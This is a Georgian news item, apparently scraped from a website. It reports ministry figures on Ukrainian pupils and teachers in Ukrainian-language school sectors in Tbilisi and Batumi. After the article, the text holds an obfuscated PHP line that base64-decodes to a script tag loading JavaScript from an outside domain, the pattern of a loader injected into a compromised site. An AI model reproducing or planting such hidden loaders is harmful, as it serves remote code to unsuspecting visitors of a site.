celsiusi
ავერსი საქკაბელი
თბილისსა და რეგიონებში უკრაინულენოვან სექტორზე მოსწავლეებს 29 პედაგოგი ასწავლის, აქედან მიხეილ გრუშევსკის სახელობის 41-ე საჯარო სკოლაში, 22 მასწავლებელია დასაქმებული, საიდანაც 7 საქართველოს მოქალაქეა. ბათუმის მე-20 საჯარო სკოლაში, უკრაინულენოვან სექტორზე კი, ჯამში, 7 პედაგოგია დასაქმებული, აქედან 6 უკრაინის, ხოლო 1 - საქართველოს მოქალაქეა, - ამის შესახებ „ინტერპრესნიუსს“ განათლების და მეცნიერების სამინისტროში განუცხადეს.
 
როგორც უწყებაში აღნიშნავენ, ამ დროისათვის არსებული მონაცემებით, საქართველოში უკრაინიდან ჩამოსული სხვადასხვა ასაკის 912 მოსწავლე სწავლობს.
 
„საქართველოს მთავრობის გადაწყვეტილებით, მოსწავლეები, რომლებიც უკრაინაში დაწყებული საომარი მოქმედებების შედეგად ვერ აგრძელებენ ზოგადი განათლების მიღებას უკრაინის სკოლებში და გამოხატავენ სურვილს, სწავლა გააგრძელონ საქართველოში, სკოლებში გამარტივებული წესით ირიცხებიან. საქართველოს პრემიერ-მინისტრის ირაკლი ღარიბაშვილის გადაწყვეტილებით, თბილისსა და ბათუმში უკრაინულენოვანი სექტორები გაიხსნა, სადაც მოსწავლეებს მშობლიურ ენაზე აქვთ განათლების მიღების შესაძლებლობა, უკრაინული სასწავლო გეგმის შესაბამისად.
 
ამ დროისათვის არსებული მონაცემებით, თბილისსა და რეგიონებში, სხვადასხვა ასაკის 912 მოსწავლე უკვე ჩარიცხულია, მათ შორის 316 მოსწავლე - სსიპ მიხეილ გრუშევსკის სახელობის ქალაქ თბილისის N41 საჯარო სკოლის უკრაინულ სექტორზე და 100 მოსწავლე - სსიპ ქალაქ ბათუმის N20 საჯარო სკოლის უკრაინულ სექტორზე (ჯამში უკრაინულ სექტორზე - 416 მოსწავლეა). მიხეილ გრუშევსკის სახელობის 41-ე საჯარო სკოლაში, უკრაინულენოვან სექტორზე სულ 22 მასწავლებელია დასაქმებული, აქედან 7 საქართველოს მოქალაქეა. ბათუმის მე-20 საჯარო სკოლაში, უკრაინულენოვან სექტორზე კი ჯამში 7 პედაგოგია დასაქმებული, აქედან 6 უკრაინის, ხოლო 1 საქართველოს მოქალაქეა“, - განუცხადეს „ინტერპრესნიუსს“ განათლების და მეცნიერების სამინისტროში.
561
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");